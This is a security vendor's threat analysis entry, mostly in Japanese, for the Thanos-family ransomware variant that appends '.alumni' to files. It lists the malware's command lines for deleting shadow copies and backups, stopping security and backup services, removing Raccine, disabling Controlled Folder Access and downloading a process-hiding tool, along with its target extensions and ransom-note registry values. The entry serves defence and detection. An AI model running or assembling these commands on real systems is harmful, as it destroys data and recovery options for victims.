Ransom.MSIL.THANOS.THBAIBA

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

マルウェアは、セキュリティ製品に関連するレジストリキーを削除します。これにより、マルウェアは、感染コンピュータにインストールされているセキュリティ製品に検出されることなく、自身の不正活動を実行することが可能になります。

身代金要求文書のファイルを作成します。

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のファイルを作成します。

• %User Startup%\mystartup.lnk → points to %User Temp%\HOW_TO_RECOVER_YOUR_FILES.txt (Ransom Note)

(註：%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザー名＞\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Local\Temp" です。)

マルウェアは、以下のプロセスを追加します。

• "%System%\notepad.exe" %Desktop%\HOW_TO_RECOVER_YOUR_FILES.txt
• "icacls" "Z:*" /grant Everyone:F /T /C /Q
• "icacls" "D:*" /grant Everyone:F /T /C /Q
• "icacls" "C:*" /grant Everyone:F /T /C /Q
• "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
• "taskkill.exe" /IM mydesktopservice.exe /F
• "taskkill.exe" /IM thebat.exe /F
• "taskkill.exe" /IM steam.exe /F
• "taskkill.exe" /IM agntsvc.exe /F
• "taskkill.exe" /IM xfssvccon.exe /F
• "taskkill.exe" IM thunderbird.exe /F
• "taskkill.exe" /IM dbsnmp.exe /F
• "taskkill.exe" /IM zoolz.exe /F
• "taskkill.exe" /IM infopath.exe /F
• "taskkill.exe" /IM mbamtray.exe /F
• "taskkill.exe" /IM thebat64.exe /F
• "taskkill.exe" /IM ocomm.exe /F
• "taskkill.exe" /IM dbeng50.exe /F
• "taskkill.exe" /IM sqlwriter.exe /F
• "taskkill.exe" /IM tbirdconfig.exe /F
• "taskkill.exe" /IM excel.exe /F
• "taskkill.exe" /IM CNTAoSMgr.exe /F
• "taskkill.exe" /IM sqlservr.exe /F
• "taskkill.exe" /IM encsvc.exe /F
• "taskkill.exe" /IM sqlbrowser.exe /F
• "taskkill.exe" /IM oracle.exe /F
• "taskkill.exe" /IM sqlagent.exe /F
• "taskkill.exe" /IM ocautoupds.exe /F
• "taskkill.exe" /IM ocssd.exe /F
• "taskkill.exe" /IM mysqld-opt.exe /F
• "taskkill.exe" /IM mysqld-nt.exe /F
• "taskkill.exe" /IM wordpad.exe /F
• "taskkill.exe" /IM mydesktopservice.exe /F
• "taskkill.exe" /IM winword.exe /F
• "taskkill.exe" /IM mydesktopqos.exe /F
• "taskkill.exe" /IM visio.exe /F
• "taskkill.exe" /IM powerpnt.exe /F
• "taskkill.exe" /IM tmlisten.exe /F
• "taskkill.exe" /IM msftesql.exe /F
• "taskkill.exe" /IM outlook.exe /F
• "taskkill.exe" /IM msaccess.exe /F
• "taskkill.exe" /IM onenote.exe /F
• "taskkill.exe" /IM PccNTMon.exe /F
• "taskkill.exe" /IM Ntrtscan.exe /F
• "taskkill.exe" /IM isqlplussvc.exe /F
• "taskkill.exe" /IM mydesktopqos.exe /F
• "taskkill.exe" /IM firefoxconfig.exe /F
• "taskkill.exe" /IM sqbcoreservice.exe /F
• "taskkill.exe" /IM mspub.exe /F
• "taskkill.exe" /IM synctime.exe /F
• "taskkill.exe" /IM mysqld.exe /F
• "taskkill.exe" /IM mspub.exe /F
• "net.exe" stop TrueKeyScheduler /y
• "net.exe" stop SQLTELEMETRY /y
• "net.exe" stop SQLSERVERAGENT /y
• "net.exe" stop SQLSafeOLRService /y
• "net.exe" stop TrueKey /y
• "net.exe" stop tmlisten /y
• "net.exe" stop TmCCSF /y
• "net.exe" stop SQLBrowser /y
• "net.exe" stop SQLAgent$VEEAMSQL2012 /y
• "net.exe" stop vapiendpoint /y
• "net.exe" stop swi_update /y
• "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
• "net.exe" stop swi_update_64 /y
• "net.exe" stop mssql$vim_sqlexp /y
• "net.exe" stop mfefire /y
• "net.exe" stop SQLAgent$TPSAMA /y
• "net.exe" stop OracleClientCache80 /y
• "net.exe" stop WRSVC /y
• "net.exe" stop swi_service /y
• "net.exe" stop SQLTELEMETRY$ECWDB2 /y
• "net.exe" stop VeeamTransportSvc /y
• "net.exe" stop SQLAgent$TPS /y
• "net.exe" stop TrueKeyServiceHelper /y
• "net.exe" stop McTaskManager /y
• "net.exe" stop swi_filter /y
• "net.exe" stop SstpSvc /y
• "net.exe" stop MySQL80 /y
• "net.exe" stop SQLAgent$SYSTEM_BGC /y
• "net.exe" stop svcGenericHost /y
• "net.exe" stop SQLAgent$SOPHOS /y
• "net.exe" stop SQLAgent$SQLEXPRESS /y
• "net.exe" stop SQLAgent$SQL_2008 /y
• "net.exe" stop sophossps /y
• "net.exe" stop SQLAgent$SHAREPOINT /y
• "net.exe" stop SntpService /y
• "net.exe" stop SQLAgent$SBSMONITORING /y
• "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
• "net.exe" stop SmcService /y
• "net.exe" stop Smcinst /y
• "net.exe" stop SQLAgent$PROD /y
• "net.exe" stop SQLAgent$PRACTTICEMGT /y
• "net.exe" stop ShMonitor /y
• "net.exe" stop SQLAgent$PRACTTICEBGC /y
• "net.exe" stop SepMasterService /y
• "net.exe" stop SAVService /y
• "net.exe" stop SAVAdminService /y
• "net.exe" stop SQLAgent$ECWDB2 /y
• "net.exe" stop SQLAgent$CXDB /y
• "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
• "net.exe" stop sacsvr /y
• "net.exe" stop MSSQL$SOPHOS /y
• "net.exe" stop sms_site_sql_backup /y
• "net.exe" stop SQLAgent$BKUPEXEC /y
• "net.exe" stop RESvc /y
• "net.exe" stop mfevtp /y
• "net.exe" stop wbengine /y
• "net.exe" stop ReportServer$SQL_2008 /y
• "net.exe" stop mfemms /y
• "net.exe" stop wbengine /y
• "net.exe" stop DCAgent /y
• "net.exe" stop MSSQL$SHAREPOINT /y
• "net.exe" stop BackupExecVSSProvider /y
• "net.exe" stop MSSQL$ECWDB2 /y
• "net.exe" stop audioendpointbuilder /y
• "net.exe" stop “Sophos Safestore Service” /y
• "net.exe" stop BackupExecAgentBrowser /y
• "net.exe" stop MSSQL$PRACTICEMGT /y
• "net.exe" stop “Sophos System Protection Service” /y
• "net.exe" stop BackupExecDeviceMediaService /y
• "net.exe" stop MSSQL$PRACTTICEBGC /y
• "net.exe" stop “Sophos Web Control Service” /y
• "net.exe" stop BackupExecJobEngine /y
• "net.exe" stop MSSQL$PROD /y
• "net.exe" stop AcronisAgent /y
• "net.exe" stop BackupExecManagementService /y
• "net.exe" stop MSSQL$PROFXENGAGEMENT /y
• "net.exe" stop Antivirus /y
• "net.exe" stop BackupExecRPCService /y
• "net.exe" stop MSSQL$SBSMONITORING /
• "net.exe" stop MSSQL$SBSMONITORING /y
• "net.exe" stop AVP /y
• "net.exe" stop msftesql$PROD /y
• "net.exe" stop VeeamRESTSvc /y
• "net.exe" stop BackupExecAgentAccelerator /y
• "net.exe" stop “SQLsafe Filter Service” /y
• "net.exe" stop McShield /y
• "net.exe" stop “Sophos Message Router” /y
• "net.exe" stop unistoresvc_1af40a /y
• "net.exe" stop MSSQL$BKUPEXEC /y
• "net.exe" stop “Sophos MCS Client” /y
• "net.exe" stop ARSM /y
• "net.exe" stop msexchangeimap4 /y
• "net.exe" stop MSOLAP$TPSAMA /y
• "net.exe" stop “intel(r) proset monitoring service” /y
• "net.exe" stop “Sophos MCS Agent” /y
• "net.exe" stop AcrSch2Svc /y
• "net.exe" stop msexchangeadtopology /y
• "net.exe" stop MSOLAP$TPS /y
• "net.exe" stop “aphidmonitorservice” /y
• "net.exe" stop ReportServer$TPSAMA /y
• "net.exe" stop “Zoolz 2 Service” /y
• "net.exe" stop “Sophos Health Service” /y
• "net.exe" stop W3Svc /y
• "net.exe" stop MSExchangeSRS /y
• "net.exe" stop MSOLAP$SYSTEM_BGC /y
• "net.exe" stop “Veeam Backup Catalog Data Service” /y
• "net.exe" stop ReportServer$TPS /y
• "net.exe" stop “Sophos File Scanner Service” /y
• "net.exe" stop MSExchangeSA /y
• "net.exe" stop UI0Detect /y
• "net.exe" stop MSOLAP$SQL_2008 /y
• "net.exe" stop “Symantec System Recovery” /y
• "net.exe" stop ReportServer$SYSTEM_BGC /y
• "net.exe" stop “Sophos Device Control Service” /y
• "net.exe" stop ReportServer$SQL_2008 /y
• "net.exe" stop MySQL57 /y
• "net.exe" stop MSExchangeMTA /y
• "net.exe" stop SMTPSvc /y
• "net.exe" stop VeeamNFSSvc /y
• "net.exe" start upnphost /y
• "net.exe" stop MsDtsServer /y
• "net.exe" stop IISAdmin /y
• "net.exe" stop MSExchangeES /y
• "net.exe" stop “Sophos Agent” /y
• "net.exe" stop EraserSvc11710 /y
• "net.exe" stop “Enterprise Client Service” /y
• "net.exe" stop “SQL Backups /y
• "net.exe" stop MsDtsServer100 /y
• "net.exe" stop NetMsmqActivator /y
• "net.exe" stop MSExchangeIS /y
• "net.exe" stop “Sophos AutoUpdate Service” /y
• "net.exe" stop SamSs /y
• "net.exe" stop ReportServer /y
• "net.exe" stop “SQLsafe Backup Service” /y
• "net.exe" stop MsDtsServer110 /y
• "net.exe" stop POP3Svc /y
• "net.exe" stop MSExchangeMGMT /y
• "net.exe" stop “Sophos Clean Service” /y
• "net.exe" stop zhudongfangyu /y
• "net.exe" stop stc_raw_agent /y
• "net.exe" stop VSNAPVSS /y
• "net.exe" stop VeeamTransportSvc /y
• "net.exe" stop VeeamDeploymentService /y
• "net.exe" stop VeeamNFSSvc /y
• "net.exe" stop veeam /y
• "net.exe" stop PDVFSService /y
• "net.exe" stop BackupExecVSSProvider /y
• "net.exe" stop BackupExecAgentAccelerator /y
• "net.exe" stop BackupExecAgentBrowser /y
• "net.exe" stop BackupExecDiveciMediaService /y
• "net.exe" stop BackupExecJobEngine /y
• "net.exe" stop BackupExecManagementService /y
• "net.exe" stop BackupExecRPCService /y
• "net.exe" stop AcrSch2Svc /y
• "net.exe" stop AcronisAgent /y
• "net.exe" stop CASAD2DWebSvc /y
• "net.exe" stop CAARCUpdateSvc /y
• "net.exe" stop sophos /y
• "net.exe" stop “Acronis VSS Provider” /y
• "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
• "net.exe" start FDResPub /y
• "net.exe" start SSDPSRV /y
• "net.exe" stop avpsus /y
• "net.exe" stop McAfeeDLPAgentService /y
• "net.exe" stop mfewc /y
• "net.exe" stop BMR Boot Service /y
• "net.exe" stop NetBackup BMR MTFTP Service /y
• "net.exe" stop DefWatch /y
• "net.exe" stop ccEvtMgr /y
• "net.exe" stop ccSetMgr /y
• "net.exe" stop SavRoam /y
• "net.exe" stop RTVscan /y
• "net.exe" stop QBFCService /y
• "net.exe" stop QBIDPService /y
• "net.exe" stop Intuit.QuickBooks.FCS /y
• "net.exe" stop QBCFMonitorService /y
• "net.exe" stop YooBackup /y
• "net.exe" stop YooIT /y
• "net.exe" stop MSSQLServerOLAPService /y
• "net.exe" stop VeeamMountSvc /y
• "net.exe" stop McAfeeFramework /y
• "net.exe" stop MSSQLServerADHelper100 /y
• "net.exe" stop McAfeeEngineService /y
• "net.exe" stop VeeamHvIntegrationSvc /y
• "net.exe" stop MSSQLServerADHelper /y
• "net.exe" stop MBEndpointAgent /y
• "net.exe" stop VeeamEnterpriseManagerSvc /y
• "net.exe" stop VeeamDeploySvc /y
• "net.exe" stop MSSQLSERVER /y
• "net.exe" stop MBAMService /y
• "net.exe" stop MSSQLFDLauncher$TPSAMA /y
• "net.exe" stop masvc /y
• "net.exe" stop VeeamDeploymentService /y
• "net.exe" stop MSSQLFDLauncher$TPS /y
• "net.exe" stop macmnsvc /y
• "net.exe" stop VeeamCloudSvc /y
• "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
• "net.exe" stop VeeamCatalogSvc /y
• "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
• "net.exe" stop klnagent /y
• "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
• "net.exe" stop kavfsslp /y
• "net.exe" stop VeeamBrokerSvc /y
• "net.exe" stop KAVFSGT /y
• "net.exe" stop VeeamBackupSvc /y
• "net.exe" stop SQLWriter /y
• "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
• "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
• "net.exe" stop KAVFS /y
• "net.exe" stop FA_Scheduler /y
• "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
• "net.exe" stop SDRSVC /y
• "net.exe" stop MSSQL$VEEAMSQL2012 /y
• "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
• "net.exe" stop ESHASRV /y
• "net.exe" stop PDVFSService /y
• "net.exe" stop EsgShKernel /y
• "net.exe" stop MSSQL$TPSAMA /y
• "net.exe" stop ntrtscan /y
• "net.exe" stop EPUpdateService /y
• "net.exe" stop MSSQL$TPS /y
• "net.exe" stop EPSecurityService /y
• "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
• "net.exe" stop MSSQL$SYSTEM_BGC /y
• "net.exe" stop ekrn /y
• "net.exe" stop mozyprobackup /y
• "net.exe" stop MMS /y
• "net.exe" stop MSSQL$SQLEXPRESS /y
• "net.exe" stop EhttpSrv /y
• "net.exe" stop bedbg /y
• "net.exe" stop MSSQL$SQL_2008 /y
• "net.exe" start Dnscache /y
• "sc.exe" config SSDPSRV start= auto
• "sc.exe" config FDResPub start= auto
• "sc.exe" config upnphost start= auto
• "sc.exe" config SstpSvc start= disabled
• "sc.exe" config SQLWriter start= disabled
• "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
• "sc.exe" config SQLTELEMETRY start= disabled
• "sc.exe" config Dnscache start= auto
• "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
• "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
• "cmd.exe" /c rd /s /q D:\$Recycle.bin
• "schtasks" /DELETE /TN "Raccine Rules Updater" /F
• "cmd.exe" /c rd /s /q %%SYSTEMDRIVE%%\$Recycle.bin
• "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
• "reg" delete HKCU\Software\Raccine /F
• "taskkill" /F /IM RaccineSettings.exe
• powershell.exe Set-MpPreference -EnableControlledFolderAccess Disable

(註：%Desktop%フォルダは、現在ログオンしているユーザのデスクトップです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Desktop" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\Desktop" です。)

マルウェアは、以下の Mutex を作成し、メモリ上で自身の重複実行を避けます。

• Global\a61e092f-af60-4971-9606-2414b1d0e04b

マルウェアは、感染コンピュータ上のメモリに以下のプロセスを確認すると、自身を終了します。

• http analyzer stand-alone
• fiddler
• effetech http sniffer
• firesheep
• IEWatch Professional
• dumpcap
• wireshark
• wireshark portable
• sysinternals tcpview
• NetworkMiner
• NetworkTrafficView
• HTTPNetworkSniffer
• tcpdump
• intercepter
• Intercepter-NG
• ollydbg
• x64dbg
• x32dbg
• dnspy
• dnspy-x86
• de4dot
• ilspy
• dotpeek
• dotpeek64
• ida64
• RDG Packer Detector
• CFF Explorer
• PEiD
• protection_id
• LordPE
• pe-sieve
• MegaDumper
• UnConfuserEx
• Universal_Fixer
• NoFuserEx

他のシステム変更

マルウェアは、以下のレジストリ値を追加します。

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Winlogon
LegalNoticeCaption = YOUR FILES IN SAFELY LOCKED AND YOUR PASSWORD WAS CHANGED by Alumni AFTER THE PAYMENT PLEASE CONTACT WITH US ASAP.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Winlogon
LegalNoticeText = {Text from Ransom Note}

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Policies\
System
legalnoticecaption = YOUR FILES IN SAFELY LOCKED AND YOUR PASSWORD WAS CHANGED by Alumni AFTER THE PAYMENT PLEASE CONTACT WITH US ASAP.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Policies\
System
legalnoticetext = {Text from Ransom Note}

マルウェアは、セキュリティ製品に関連するレジストリキーを削除します。

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\EventLog\Application
Raccine =

HKEY_LOCAL_MACHINE\SOFTWARE
Raccine =

HKEY_CURRENT_USER\SOFTWARE
Raccine =

その他

マルウェアは、以下の拡張子をもつファイルを暗号化します。

• .txt
• .jpeg
• .gif
• .jpg
• .png
• .php
• .cs
• .cpp
• .rar
• .zip
• .html
• .htm
• .xls
• .avi
• .mp4
• .ppt
• .doc
• .sxi
• .sxw
• .odt
• .hwp
• .tar
• .bz2
• .mkv
• .eml
• .msg
• .ost
• .pst
• .edb
• .sql
• .accdb
• .mdb
• .dbf
• .odb
• .myd
• .java
• .pas
• .asm
• .key
• .pfx
• .pem
• .p12
• .csr
• .gpg
• .aes
• .vsd
• .odg
• .raw
• .nef
• .svg
• .psd
• .vmx
• .vmdk
• .vdi
• .lay6
• .sqlite3
• .sqlitedb
• .class
• .mpeg
• .djvu
• .tiff
• .backup
• .cert
• .docm
• .xlsm
• .dwg
• .bak
• .qbw
• .nd
• .tlg
• .lgb
• .pptx
• .mov
• .xdw
• .ods
• .wav
• .mp3
• .aiff
• .flac
• .m4a
• .ora
• .mdf
• .ldf
• .ndf
• .dtsx
• .rdl
• .dim
• .mrimg
• .qbb
• .rtf
• .7z

マルウェアは、以下を実行します。

• encrypts all available drives except for CDROMs
• empties recycle bin using the following commands:
  • "cmd.exe" /c rd /s /q D:\$Recycle.bin
  • "cmd.exe" /c rd /s /q %%SYSTEMDRIVE%%\$Recycle.bin
• Terminates and deletes itself using the following commands:
  • cmd.exe /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  • cmd.exe /C choice /C Y /N /D Y /T 3 & Del
• deletes the following subkeys under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options:
  • vssadmin.exe
  • wmic.exe
  • wbadmin.exe
  • bcdedit.exe
  • powershell.exe
  • diskshadow.exe
  • net.exe
• displays the following tooltip notification:
  
• attempts to hide itself from specific monitoring tools by doing the following:
  • downloads ProcessHide32/64 binary to %User Temp%\{random}.exe (deletes after use) from the following URLs:
    • https://raw.{BLOCKED}usercontent.com/d35ha/ProcessHide/master/bins/ProcessHide64.exe
    • https://raw.{BLOCKED}usercontent.com/d35ha/ProcessHide/master/bins/ProcessHide32.exe
  • checks if the following monitoring processes containing the following strings are running:
    • Taskmgr
    • taskmgr
    • ProcessHacker
    • procexp
  • executes ProcessHide32/64 with the following parameters:
    • {PID of checked process} {full file path + name of malware} [" *32"]
• terminates large running processes taking up memory if the following strings are not found in the process name:
  • {malware name}.exe
  • chrome
  • opera
  • msedge
  • iexplore
  • firefox
  • explorer
  • wininit
  • winlogon
  • SearchApp
  • SearchIndexer
  • SearchUI
• if infected system is in Windows XP, creates the following processes to delete shadow copies:
  • vssadmin.exe Delete Shadows /all /quiet
  • vssadmin.exe resize shadowstorage /for=c: /on=c: /maxsize=401MB
  • vssadmin.exe resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  • vssadmin.exe resize shadowstorage /for=d: /on=d: /maxsize=401MB
  • vssadmin.exe resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  • vssadmin.exe resize shadowstorage /for=e: /on=e: /maxsize=401MB
  • vssadmin.exe resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  • vssadmin.exe resize shadowstorage /for=f: /on=f: /maxsize=401MB
  • vssadmin.exe resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  • vssadmin.exe resize shadowstorage /for=g: /on=g: /maxsize=401MB
  • vssadmin.exe resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  • vssadmin.exe resize shadowstorage /for=h: /on=h: /maxsize=401MB
  • vssadmin.exe resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  • vssadmin.exe Delete Shadows /all /quiet
• attempts to delete backup files using the following processes:
  • del.exe /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
  • del.exe /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
  • del.exe /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
  • del.exe /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
  • del.exe /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk

ランサムウェアの不正活動

マルウェアは、ファイル名に以下の文字列を含むファイルの暗号化はしません。

• autoexec.bat
• desktop.ini
• autorun.inf
• ntuser.dat
• NTUSER.DAT
• iconcache.db
• bootsect.bak
• boot.ini
• ntuser.dat.log
• thumbs.db
• bootmgr
• pagefile.sys
• config.sys
• ntuser.ini
• Builder_Log
• RSAKeys
• HOW_TO_RECOVER_YOUR_FILES → Ransom Note
• .alumni
• .exe
• .dll
• .EXE
• .DLL
• Recycle.Bin
• mystartup.lnk
• UserName={Username}_MachineName={Computer Name}_{Volume Serial Number + ProcessorID}.txt

マルウェアは、ファイルパスに以下の文字列を含むファイルの暗号化はしません。

• program files
• :\windows
• perflogs
• internet explorer
• :\programdata
• appdata
• msocache
• system volume information
• boot
• tor browser
• mozilla
• google chrome
• application data

マルウェアは、暗号化されたファイルのファイル名に以下の拡張子を追加します。

• .alumni

マルウェアが作成する以下のファイルは、脅迫状です。

• %User Temp%\HOW_TO_RECOVER_YOUR_FILES.txt
• %Desktop%\HOW_TO_RECOVER_YOUR_FILES.txt
• {encrypted directory}\HOW_TO_RECOVER_YOUR_FILES.txt
•